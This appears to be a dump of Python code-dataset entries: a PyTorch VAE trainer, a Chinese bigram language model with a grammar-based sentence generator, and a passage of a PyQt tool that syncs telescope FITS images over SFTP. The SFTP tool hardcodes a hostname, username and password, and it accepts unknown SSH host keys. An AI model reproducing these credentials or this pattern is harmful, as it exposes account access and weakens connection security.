parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--epoch\", type=int, default=40)\n parser.add_argument(\"--nz\", type=int, default=20)\n parser.add_argument(\"--layersize\", type=int, default=400)\n parser.add_argument(\"--alpha\", type=float, default=1)\n parser.add_argument(\"--lr\", type=float, default=0.0001)\n parser.add_argument(\"--b1\", type=float, default=0.9)\n parser.add_argument(\"--b2\", type=float, default=0.999)\n parser.add_argument(\"--e\", type=float, default=1e-8)\n parser.add_argument(\"--bsize\", type=int, default=64)\n return parser.parse_args()\n\nargs = parse_args()\n\n\nnp.random.seed(111)\n\nclass VAE(nn.Module):\n def __init__(self, numbers):\n super().__init__()\n\n self.numbers = numbers\n\n self.epochs = args.epoch\n self.batch_size = args.bsize\n self.learning_rate = args.lr\n self.decay = 0.001\n self.nz = args.nz\n self.layersize = args.layersize\n\n self.img_path = \"./images\"\n if not os.path.exists(self.img_path):\n os.makedirs(self.img_path)\n\n # Xavier initialization is used to initialize the weights\n # init encoder weights\n self._e_W0 = np.random.randn(784, self.layersize).astype(np.float32) * np.sqrt(2.0/(784))\n self._e_b0 = np.zeros(self.layersize).astype(np.float32)\n\n self._e_W_mu = np.random.randn(self.layersize, self.nz).astype(np.float32) * np.sqrt(2.0/(self.layersize))\n self._e_b_mu = np.zeros(self.nz).astype(np.float32)\n\n self._e_W_logvar = np.random.randn(self.layersize, self.nz).astype(np.float32) * np.sqrt(2.0/(self.layersize))\n self._e_b_logvar = np.zeros(self.nz).astype(np.float32)\n\n # init decoder weights\n self._d_W0 = np.random.randn(self.nz, self.layersize).astype(np.float32) * np.sqrt(2.0/(self.nz))\n self._d_b0 = np.zeros(self.layersize).astype(np.float32)\n\n self._d_W1 = np.random.randn(self.layersize, 784).astype(np.float32) * np.sqrt(2.0/(self.layersize))\n self._d_b1 = np.zeros(784).astype(np.float32)\n\n #\n self.e_W0 = 
nn.Parameter(torch.from_numpy(self._e_W0).float())\n self.e_b0 = nn.Parameter(torch.from_numpy(self._e_b0).float())\n self.e_W_mu = nn.Parameter(torch.from_numpy(self._e_W_mu).float())\n self.e_b_mu = nn.Parameter(torch.from_numpy(self._e_b_mu).float())\n self.e_W_logvar = nn.Parameter(torch.from_numpy(self._e_W_logvar).float())\n self.e_b_logvar = nn.Parameter(torch.from_numpy(self._e_b_logvar).float())\n\n self.d_W0 = nn.Parameter(torch.from_numpy(self._d_W0).float())\n self.d_b0 = nn.Parameter(torch.from_numpy(self._d_b0).float())\n self.d_W1 = nn.Parameter(torch.from_numpy(self._d_W1).float())\n self.d_b1 = nn.Parameter(torch.from_numpy(self._d_b1).float())\n\n # init Adam optimizer\n self.b1 = args.b1\n self.b2 = args.b2\n self.e = args.e\n self.m = [0] * 10\n self.v = [0] * 10\n self.t = 0\n\n def encoder(self, img):\n #self.e_logvar : log variance\n #self.e_mean : mean\n\n e_input = np.reshape(img, (self.batch_size,-1))\n e_input = torch.from_numpy(e_input).float()\n\n e_h0_l = torch.matmul(e_input, self.e_W0) + self.e_b0\n e_h0_a = nn.LeakyReLU(negative_slope=0.01)(e_h0_l)\n\n e_logvar = torch.matmul(e_h0_a, self.e_W_logvar) + self.e_b_logvar\n e_mu = torch.matmul(e_h0_a, self.e_W_mu) + self.e_b_mu\n\n return e_mu, e_logvar\n\n def decoder(self, z):\n #self.d_out : reconstruction image 28x28\n\n z = z.view(self.batch_size, self.nz)\n\n d_h0_l = torch.matmul(z, self.d_W0) + self.d_b0\n d_h0_a = torch.relu(d_h0_l)\n\n d_h1_l = torch.matmul(d_h0_a, self.d_W1) + self.d_b1\n d_h1_a = torch.sigmoid(d_h1_l)\n\n d_out = d_h1_a.view(self.batch_size, 28, 28, 1)\n\n return d_out\n\n def forward(self, x):\n #Encode\n mu, logvar = self.encoder(x)\n\n #use reparameterization trick to sample from gaussian\n sample_z = mu + torch.exp(logvar * .5) * torch.from_numpy(np.random.standard_normal(size=(self.batch_size, self.nz))).float()\n\n decode = self.decoder(sample_z)\n\n return decode, mu, logvar, None, sample_z\n\n def train(self, optimizer):\n\n #Read in training data\n trainX, _, train_size = mnist_reader(self.numbers)\n\n np.random.shuffle(trainX)\n\n #set batch indices\n batch_idx = train_size//self.batch_size\n batches_per_epoch = min(10, batch_idx)\n # batches_per_epoch = batch_idx\n del batch_idx\n\n total_loss = 0\n total_kl = 0\n total = 0\n\n for epoch in range(self.epochs):\n for idx in range(batches_per_epoch):\n # prepare batch and input vector z\n train_batch = trainX[idx*self.batch_size:idx*self.batch_size + self.batch_size]\n #ignore batch if there are insufficient elements\n if train_batch.shape[0] != self.batch_size:\n break\n\n ################################\n # Forward Pass\n ################################\n\n out, mu, logvar, _, sample_z = self(train_batch)\n\n # Reconstruction Loss\n rec_loss = nn.BCELoss(reduction='sum')(out, torch.from_numpy(train_batch).float())\n\n #K-L Divergence\n # kl = -0.5 * np.sum(1 + logvar - np.power(mu, 2) - np.exp(logvar))\n kl = -0.5 * torch.sum(1 + logvar - mu ** 2 - torch.exp(logvar))\n\n loss = rec_loss + kl\n loss = loss / self.batch_size\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n rec_loss = rec_loss.item()\n kl = kl.item()\n\n #Loss Recordkeeping\n total_loss += rec_loss / self.batch_size\n total_kl += kl / self.batch_size\n total += 1\n\n self.img = np.squeeze(out.data.numpy(), axis=3) * 2 - 1\n\n print(\"Epoch [%d] Step [%d/%d] RC Loss:%.4f KL Loss:%.4f lr: %.4f\"%(\n epoch, idx, batches_per_epoch, rec_loss / self.batch_size, kl / self.batch_size, self.learning_rate))\n\n sample = np.array(self.img)\n\n #save 
image result every epoch\n img_tile(sample, self.img_path, epoch, idx, \"res\", True)\n\n\nif __name__ == '__main__':\n\n # Adjust the numbers that appear in the training data. Less numbers helps\n # run the program to see faster results\n numbers = [1, 2, 3]\n model = VAE(numbers)\n\n for name, p in model.named_parameters():\n print(name, p.shape)\n\n optimizer = optim.Adam(model.parameters(), lr=args.lr, betas=(args.b1, args.b2), eps=args.e)\n model.train(optimizer)\n", "sub_path": "torchvae.py", "file_name": "torchvae.py", "file_ext": "py", "file_size_in_byte": 7034, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 27, "usage_type": "attribute"}, {"api_name": "torch.nn.Module", "line_number": 29, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 29, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path", "line_number": 43, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.random.randn", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 48, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 48, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 49, "usage_type": "attribute"}, {"api_name": "numpy.random.randn", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 51, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 51, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 52, "usage_type": "attribute"}, {"api_name": "numpy.random.randn", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 54, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 54, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 55, "usage_type": "attribute"}, {"api_name": "numpy.random.randn", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 58, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 58, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 59, "usage_type": "attribute"}, {"api_name": "numpy.random.randn", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 61, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 61, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 62, "usage_type": "attribute"}, {"api_name": "torch.nn.Parameter", 
"line_number": 65, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 65, "usage_type": "name"}, {"api_name": "torch.from_numpy", "line_number": 65, "usage_type": "call"}, {"api_name": "torch.nn.Parameter", "line_number": 66, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 66, "usage_type": "name"}, {"api_name": "torch.from_numpy", "line_number": 66, "usage_type": "call"}, {"api_name": "torch.nn.Parameter", "line_number": 67, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 67, "usage_type": "name"}, {"api_name": "torch.from_numpy", "line_number": 67, "usage_type": "call"}, {"api_name": "torch.nn.Parameter", "line_number": 68, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 68, "usage_type": "name"}, {"api_name": "torch.from_numpy", "line_number": 68, "usage_type": "call"}, {"api_name": "torch.nn.Parameter", "line_number": 69, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 69, "usage_type": "name"}, {"api_name": "torch.from_numpy", "line_number": 69, "usage_type": "call"}, {"api_name": "torch.nn.Parameter", "line_number": 70, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 70, "usage_type": "name"}, {"api_name": "torch.from_numpy", "line_number": 70, "usage_type": "call"}, {"api_name": "torch.nn.Parameter", "line_number": 72, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 72, "usage_type": "name"}, {"api_name": "torch.from_numpy", "line_number": 72, "usage_type": "call"}, {"api_name": "torch.nn.Parameter", "line_number": 73, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 73, "usage_type": "name"}, {"api_name": "torch.from_numpy", "line_number": 73, "usage_type": "call"}, {"api_name": "torch.nn.Parameter", "line_number": 74, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 74, "usage_type": "name"}, {"api_name": "torch.from_numpy", "line_number": 74, "usage_type": "call"}, {"api_name": "torch.nn.Parameter", "line_number": 75, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 75, "usage_type": "name"}, {"api_name": "torch.from_numpy", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 89, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 90, "usage_type": "call"}, {"api_name": "torch.matmul", "line_number": 92, "usage_type": "call"}, {"api_name": "torch.nn.LeakyReLU", "line_number": 93, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 93, "usage_type": "name"}, {"api_name": "torch.matmul", "line_number": 95, "usage_type": "call"}, {"api_name": "torch.matmul", "line_number": 96, "usage_type": "call"}, {"api_name": "torch.matmul", "line_number": 105, "usage_type": "call"}, {"api_name": "torch.relu", "line_number": 106, "usage_type": "call"}, {"api_name": "torch.matmul", "line_number": 108, "usage_type": "call"}, {"api_name": "torch.sigmoid", "line_number": 109, "usage_type": "call"}, {"api_name": "torch.exp", "line_number": 120, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.random.standard_normal", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 120, "usage_type": "attribute"}, {"api_name": "utils_vae.mnist_reader", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.random.shuffle", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 131, "usage_type": "attribute"}, {"api_name": "torch.nn.BCELoss", "line_number": 158, 
"usage_type": "call"}, {"api_name": "torch.nn", "line_number": 158, "usage_type": "name"}, {"api_name": "torch.from_numpy", "line_number": 158, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 162, "usage_type": "call"}, {"api_name": "torch.exp", "line_number": 162, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 179, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 184, "usage_type": "call"}, {"api_name": "utils_vae.img_tile", "line_number": 187, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 200, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 200, "usage_type": "name"}]} {"seq_id": "631874317", "text": "import random\r\nimport pandas as pd\r\nimport re\r\nimport jieba\r\nfrom collections import Counter\r\nfrom functools import reduce\r\nfrom operator import add, mul\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport random\r\n\r\n#A \"movie comment\" language can be defined as\r\ncommenter = \"\"\"\r\nsentence = noun_phrase verb_phrase \r\nnoun_phrase = noun \r\nnoun = 这部电影 | 剧情 |故事\r\nverb_phrase = verb adj_phrase\r\nverb = 是 | 感觉 | 演的 \r\nadj_phrase = adj\r\nadj = 最好看 | 好看 | 不好看 |可以 |喜欢 | 很好看\r\n\r\n\"\"\"\r\n# create the rule of grammer of \"movie reviewer\" language\r\ndef create_grammar(grammar_str, split='=>', line_split='\\n'):\r\n grammar = {}\r\n for line in grammar_str.split(line_split):\r\n if not line.strip(): continue\r\n exp, stmt = line.split(split)\r\n grammar[exp.strip()] = [s.split() for s in stmt.split('|')]\r\n return grammar\r\n\r\nchoice = random.choice\r\n# randomly create a sentence based on rule given in the specific grammer\r\ndef generate(gram, target):\r\n if target not in gram: return target # means target is a terminal expression\r\n expaned = [generate(gram, t) for t in choice(gram[target])]\r\n return ' '.join([e if e != '/n' else '\\n' for e in expaned if e != 'null'])\r\n\r\nfilename = 'C:/Users/38079/OneDrive/桌面/NLP/Assignment/l1/movie_comments.csv'\r\ncontent = pd.read_csv(filename, encoding='UTF-8', low_memory=False)\r\n# print(content.head())\r\narticles = content['comment'].tolist()\r\n# print((articles[0]))\r\n\r\n#Remove special characters such as line breaks: use regular matching to directly extract words\r\ndef token(string):\r\n return re.findall('\\w+', string)\r\n\r\n# print(token(articles[1]))\r\n# print(list(jieba.cut(articles[110])))\r\n# with_jieba_cut = Counter(jieba.cut(articles[110]))\r\n# print(with_jieba_cut.most_common()[:10])\r\n# print(''.join(token(articles[110])))\r\n\r\n#Cleaning text\r\narticles_clean = [''.join(token(str(a)))for a in articles]\r\n# print(len(articles_clean))\r\n# print((articles_clean[1]))\r\n\r\n# Write plain text to txt\r\nwith open('article.txt', 'w', encoding='utf-8') as f:\r\n for a in articles_clean:\r\n f.write(a + '\\n')\r\n\r\n#Word segmentation\r\ndef cut(string): return list(jieba.cut(string))\r\nTOKEN = []\r\nfor i, line in enumerate((open('article.txt',encoding='utf-8'))):\r\n if i % 10000 == 0: print(i)\r\n if i > 20000: break \r\n TOKEN += cut(line)\r\n\r\nwords_count = Counter(TOKEN)# Do statistics\r\n#print(words_count.most_common(100))\r\nfrequiences = [f for w, f in words_count.most_common(100)]\r\nx = [i for i in range(100)]\r\n\r\n#Visualization (Plot the vocabulary frequency of the top 100 statistical results)\r\nfig = plt.figure()\r\nax1 = fig.add_subplot(2,1,1) # 画2行1列个图形的第1个\r\nax2 = fig.add_subplot(2,1,2) # 画2行1列个图形的第2个\r\nax1.plot(x, frequiences)\r\n# print(plt.plot(x, 
np.log(frequiences)))\r\nax2.plot(x, np.log(frequiences))\r\nplt.show()\r\n\r\n# Probability of occurrence of a single word\r\n# def prob_1(word):\r\n# return words_count[word] / len(TOKEN)\r\n# print(prob_1('我们'))\r\nTOKEN[:10]\r\nTOKEN = [str(t) for t in TOKEN]\r\nTOKEN_2_GRAM = [''.join(TOKEN[i:i+2]) for i in range(len(TOKEN[:-2]))]\r\n# Concatenate adjacent words and store them in a list\r\nTOKEN_2_GRAM[:10]\r\nwords_count_2 = Counter(TOKEN_2_GRAM)\r\n\r\n# Probability of two consecutive words appearing\r\ndef prob_2(word1, word2):\r\n if word1 + word2 in words_count_2: return words_count_2[word1+word2] / len(TOKEN_2_GRAM)#pr(w1|w2)=pr(w1w2)/pr(w2)\r\n else:#out of vocabulary problem\r\n return 1 / len(TOKEN_2_GRAM)\r\n# print(prob_2('我们', '在'))\r\n\r\n# Get sentence probability\r\ndef get_probablity(sentence):\r\n words = cut(sentence)\r\n sentence_pro = 1\r\n for i, word in enumerate(words[:-1]):\r\n next_ = words[i+1]\r\n probability = prob_2(word, next_)\r\n sentence_pro *= probability\r\n return sentence_pro\r\n\r\n# Generate the most reasonable sentence\r\ndef generate_best(grammer):\r\n sentences=[]\r\n for sen in [generate(gram=grammer, target='sentence') for i in range(10)]:\r\n sentence=()\r\n sentence= (sen, get_probablity(sen))\r\n sentences.append(sentence)\r\n sentences=sorted(sentences, key=lambda x: x[1], reverse=True)\r\n print(sentences[0])\r\n\r\ngenerate_best(create_grammar(commenter, split='='))", "sub_path": "Lab1/LanguageModel.py", "file_name": "LanguageModel.py", "file_ext": "py", "file_size_in_byte": 4282, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "random.choice", "line_number": 32, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 40, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 47, "usage_type": "call"}, {"api_name": "jieba.cut", "line_number": 66, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 79, "usage_type": "name"}, {"api_name": "numpy.log", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 85, "usage_type": "name"}, {"api_name": "collections.Counter", "line_number": 96, "usage_type": "call"}]} {"seq_id": "57099401", "text": "import pyqtgraph as pg\nfrom PyQt4 import QtCore, QtGui, uic\nimport os\nimport sys\nimport glob\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.figure import Figure\nfrom matplotlib.backends.backend_qt4agg import (\n FigureCanvasQTAgg as FigureCanvas,\n NavigationToolbar2QT as NavigationToolbar)\nfrom astropy.io import fits\nfrom sklearn.metrics import mean_squared_error\nfrom photutils.background import Background\nfrom photutils import detect_sources\nfrom photutils.utils import random_cmap\nfrom photutils import source_properties, properties_table\nimport paramiko\n\n# set directory\n#parentDir = r'K:\\Google Drive\\DESI\\protoDESI\\images\\fpc_data'\ndirRemote = r'/home/msdos/SBIG/'\ndirLocal = os.path.join(os.path.expanduser(\"~\"), 'Downloads', 'SBIG')\ndatasetID = ''\ndatasetDirRemote = os.path.join(dirRemote, datasetID)\ndatasetDirLocal = os.path.join(dirLocal, datasetID)\ndomain = 'desisti.kpno.noao.edu'\nusername = 'msdos'\npassword = 'MS-d0s'\nautosync = True\nprintEnabled 
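One detail worth noting in the LanguageModel record above: prob_2 divides the pair count by the total number of bigrams, which estimates the joint probability P(w1, w2) rather than the conditional P(w2 | w1) that its inline comment describes; a conditional estimate would divide by the count of w1 instead. A toy sketch of the conditional version on a made-up corpus:

from collections import Counter

tokens = ['the', 'cat', 'sat', 'on', 'the', 'mat', 'the', 'cat', 'ran']
unigrams = Counter(tokens)
bigrams = Counter(zip(tokens, tokens[1:]))

def p_next(w2, w1):
    # conditional bigram estimate: P(w2 | w1) = count(w1 w2) / count(w1)
    return bigrams[(w1, w2)] / unigrams[w1]

print(p_next('cat', 'the'))  # 0.666...: 'the' occurs 3 times, followed by 'cat' twice
print(p_next('mat', 'the'))  # 0.333...

The two estimates can rank candidate sentences differently, because the conditional form's normaliser depends on the unigram counts of the words in each sentence, so the choice matters when comparing generated candidates.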
= True\npg.mkQApp()\n\n#%% Define main window class from UI file\n\nuiPath = os.path.dirname(os.path.abspath(__file__))\nuiFile = os.path.join(uiPath, 'sti_gui.ui')\n[WindowTemplate, TemplateBaseClass] = uic.loadUiType(uiFile)\n\ndef compare_sets(sftp):\n \n setRemote = set(sftp.listdir(datasetDirRemote))\n listRemote = list(setRemote)\n listRemoteConverted = list(listRemote)\n for i in range(len(listRemote)):\n listRemoteConverted[i] = listRemoteConverted[i].replace(':','_')\n setRemoteConverted = set(listRemoteConverted)\n setLocal = set(os.listdir(datasetDirLocal))\n setTransferConverted = setRemoteConverted - (setRemoteConverted & setLocal)\n setTransfer = set(setTransferConverted)\n for filename in setTransferConverted:\n i = listRemoteConverted.index(filename)\n setTransfer.remove(listRemoteConverted[i])\n setTransfer.add(listRemote[i])\n return setTransfer\n\nclass ListeningHost(QtCore.QThread):\n \n emitter = QtCore.pyqtSignal(object)\n \n def __init__(self, sftp):\n \n self.newDataAvailable = False\n self.sftp = sftp\n QtCore.QThread.__init__(self)\n \n def run(self):\n \n while self.newDataAvailable is False:\n \n# print('Listening host is actively checking for new data...')\n setTransfer = compare_sets(self.sftp)\n\n if len(setTransfer) is 0:\n self.newDataAvailable = False\n else:\n self.newDataAvailable = True\n self.emitter.emit(None)\n \n# while self.newDataAvailable is True:\n# self.emitter.emit(None)\n\nclass MainWindow(TemplateBaseClass):\n \n def __init__(self):\n \n TemplateBaseClass.__init__(self)\n # super(MainWindow, self).__init__()\n \n # create the main window\n self.ui = WindowTemplate()\n self.ui.setupUi(self)\n #self.ui.plotBtn.clicked.connect(self.plot)\n self.show()\n self.setWindowTitle('ProtoDESI ST-i Focusing Viewer')\n self.ui.actionSync.triggered.connect(self.sync)\n \n # establish ssh\n self.open_ssh(domain, username, password) \n\n self.updateFileList()\n segFig = Figure()\n self.addmpl(segFig)\n # show first image initially\n if len(self.ui.listRaw) > 0:\n filename = self.ui.listRaw.item(0).text()\n self.updateRaw(filename)\n \n # configure listener\n self.listeningHost = ListeningHost(self.sftp)\n self.listeningHost.emitter.connect(self.receiver)\n self.listeningHost.start()\n self.msg('Listening host started.')\n \n def msg(self, text):\n \n self.ui.statusbar.showMessage(text)\n if printEnabled:\n print(text)\n \n def paramiko_sftp_progress(self, transferred, total):\n \n percentage = transferred/total*100\n total_mb = total/(1024**2)\n self.msg('{0:.2f}%, Total {1:.2f} MB \\r'.format(percentage, total_mb))\n# self.ui.statusbar.showMessage('{0:.2f}%, Total {1:.2f} MB \\r'.format(percentage, total_mb))\n\n \n def addmpl(self, fig):\n \n self.ui.canvas = FigureCanvas(fig)\n self.ui.segViewLayout.addWidget(self.ui.canvas)\n self.ui.canvas.draw()\n self.ui.toolbar = NavigationToolbar(self.ui.canvas, \n self.ui.segView, coordinates=True)\n self.ui.segViewLayout.addWidget(self.ui.toolbar)\n \n def rmmpl(self):\n self.ui.segViewLayout.removeWidget(self.ui.canvas)\n self.ui.canvas.close()\n self.ui.segViewLayout.removeWidget(self.ui.toolbar)\n self.ui.toolbar.close()\n\n def open_ssh(self, domain, user, pw):\n \n self.msg('Establishing SSH...')\n self.ssh = paramiko.SSHClient()\n self.ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n self.ssh.connect(domain, username=user, password=pw)\n \n self.msg('Establishing SFTP...')\n self.sftp = self.ssh.open_sftp()\n \n def sync(self):\n \n # respond to user click on sync button, and perform actual sync\n 
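compare_sets in the sti_gui record above has to diff two listings whose spellings differ: the remote FITS names apparently may contain ':' characters, while the local copies replace them with '_' (the sync method does the same replace before calling sftp.get). The comparison therefore happens in converted space, but the function returns the original remote spellings so the transfer can fetch them. A standalone illustration of that set arithmetic with made-up file names:

remote = {'img_12:30:01.fits', 'img_12:35:02.fits'}   # hypothetical remote listing
local = {'img_12_30_01.fits'}                         # already synced locally

converted = {name.replace(':', '_') for name in remote}
missing = converted - (converted & local)
to_transfer = {name for name in remote if name.replace(':', '_') in missing}
print(to_transfer)  # {'img_12:35:02.fits'}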
\n self.msg('Syncing new data to local drive...')\n \n if self.listeningHost.newDataAvailable:\n \n setTransfer = compare_sets(self.sftp)\n self.msg('Files to be transferred: ' + repr(setTransfer))\n \n for filename in setTransfer:\n self.msg('Transferring {} ...'.format(filename))\n filenameLocal = filename.replace(':', '_')\n try:\n self.sftp.get(\n os.path.join(datasetDirRemote, filename), \n os.path.join(datasetDirLocal, filenameLocal),\n callback = self.paramiko_sftp_progress\n )\n self.msg('Transfer is complete: {}.'.format(filename))\n except:\n self.msg('Skipping file: {}'.format(filename))\n pass\n \n self.listeningHost.newDataAvailable = False\n self.listeningHost.start()\n self.updateFileList()\n \n else:\n self.msg('No new data available for sync.')\n \n def receiver(self):\n \n # receiver for listener emitter\n if self.listeningHost.newDataAvailable:\n self.msg('New data available. Sync Now.')\n if autosync:\n self.msg('Autosync is on. Auto-syncing...')\n self.sync()\n else:\n self.msg('No new data available.')\n \n def updateFileList(self):\n \n self.msg('Updating file lists...')\n \n # filename patterns\n os.chdir(dirLocal)\n namePatternRaw = '**/*.fit*'\n imgEntries = glob.glob(namePatternRaw, recursive=True)\n\n # populate list raw\n self.ui.listRaw.clear()\n self.ui.listRaw.addItems(imgEntries)\n \n # populate list master\n self.ui.listMaster.clear()\n self.ui.listMaster.addItems(imgEntries)\n \n def updateRaw(self, filename):\n \n self.msg(repr('Showing image:'+ filename))\n filepath = os.path.join(dirLocal, filename)\n hdu = fits.open(filepath)[0]\n \n # display header\n self.ui.headerView.setCurrentFont(QtGui.QFont('Courier'))\n self.ui.headerView.setFontPointSize(9)\n self.ui.headerView.setPlainText(repr(hdu.header))\n \n # display image selected\n minlevel = np.amin(hdu.data)\n maxlevel = 2000\n self.ui.rawView.show()\n self.ui.rawView.setImage(np.rot90(hdu.data, -1))\n self.ui.rawView.setLevels(minlevel, maxlevel)\n #self.ui.rawView.autoLevels()\n\n def updatePhot(self, filename):\n \n filepath = os.path.join(datasetDirLocal, 'master', filename)\n hdu = fits.open(filepath)[0]\n data = hdu.data\n \n # display master preview\n self.msg('Showing master image:' + repr(filename))\n self.rmmpl()\n segFig = Figure()\n# cmapRand = random_cmap(segm.max+1, random_state=12345)\n axes = segFig.add_subplot(111)\n axes.imshow(data, origin='lower', cmap=plt.cm.gray)\n self.addmpl(segFig)\n\n # perform photometry\n self.msg('Performing aperture photometry...')\n self.aperture_photometry(filename)\n \n def aperture_photometry(self, filename):\n\n # aperture photometry from source segmentation\n \n # determine threshold for background detection\n # if LEDoff was used, get threshold from LEDoff/background\n filepath = os.path.join(datasetDirLocal, 'master', filename)\n filenameCombined = '\\t'.join(os.listdir(os.path.join(datasetDirLocal, 'master')))\n if 'master_ledoff_subtracted' in filename:\n self.msg('Using master_ledoff')\n # filepath = os.path.join(datasetDir, 'master', filename)\n hdu = fits.open(filepath)[0]\n data_subtracted = hdu.data\n # calculate threadhold\n ledoff_pred = np.mean(data_subtracted) * np.ones(data_subtracted.shape)\n mse = mean_squared_error(data_subtracted, ledoff_pred) \n rmse = np.sqrt(mse)\n threshold = 7.0 * rmse\n threshold_value = threshold\n \n # if no LEDoff was used, background subtraction is needed\n # there should exist no file named \"subtracted\"\n elif 'master.fit' in filenameCombined \\\n or 'master_normalised.fit' in filenameCombined:\n 
self.ui.statusbar.showMessage('Using master or master_normalised')\n \n # create preliminary mask \n \"\"\" make_source_mask not yet available in photutils v0.2.1\n wait for v0.3 release\n \"\"\"\n #from photutils import make_source_mask\n #masterMask = make_source_mask(master, snr=2, npixels=5, dilate_size=11)\n \n # background subtraction\n \"\"\" create 2D image of background and background rms and \n apply sigma-clipping to each region in the low-res \n background map to get mean, median, and std/rms. \n sigma-clipping is the most widely used method though not as \n good as using mask; still superior to robust standard \n deviation using median absolute deviation (MAD-STD)\n \"\"\"\n \n \n hdu = fits.open(filepath)[0]\n data = hdu.data\n if 'EXPTIME' in hdu.header:\n exptime = hdu.header['EXPTIME']\n else:\n exptime = hdu.header['EXPREQ']\n \n self.msg('Determining threshold for target detection...')\n # calculate threashold\n # [mean, median, std] = sigma_clipped_stats(master, sigma=3.0, iters=5)\n bkg = Background(data, (100, 100), filter_shape=(3, 3), method='median')\n # bkg = Background(master, (50, 50), filter_size=(3, 3), method='median')\n # plt.imshow(bkg.background, norm=normalisation, origin='lower', cmap=plt.cm.gray)\n plt.imshow(bkg.background, origin='lower', cmap=plt.cm.gray)\n [fig, ax] = plt.subplots(figsize=(8, 8))\n # make background-substracted image\n data_subtracted = data - bkg.background\n # plot\n plt.imshow(data_subtracted, origin='lower', cmap=plt.cm.gray)\n \n # save background subtracted image\n if 'master.fit' in filename:\n hdu_subtracted = fits.PrimaryHDU(data_subtracted)\n hdu_subtracted.writeto('master_subtracted.fits', clobber = True)\n elif 'master_normalised.fit' in filename:\n hdu_normalised_subtracted = fits.PrimaryHDU(data_subtracted)\n hdu_normalised_subtracted.writeto('master_normalised_subtracted.fits', clobber = True)\n \n # segmentation at a given sigma level, for regional properties\n threshold = 5.0 * bkg.background_rms # since data is background-subtracted\n threshold_value = threshold.flat[0]\n \n self.msg('Threshold for target detection is: ' + repr(threshold_value))\n # perform segmentation whether flat was available or not\n self.msg('Performing segmentation...')\n segm = detect_sources(data_subtracted, threshold, npixels=5)\n \n self.msg('Segmentation labels are:')\n self.msg((str(segm.labels)))\n # measure regional source properties from segmentation\n # the centroid is from image moments, already intensity-weighted\n self.msg('Measuring source properties')\n if 'bkg' in locals():\n props = source_properties(data_subtracted, segm,\n error = bkg.background_rms, background = bkg.background)\n elif 'master_ledoff_subtracted' in filenameCombined:\n filepath = 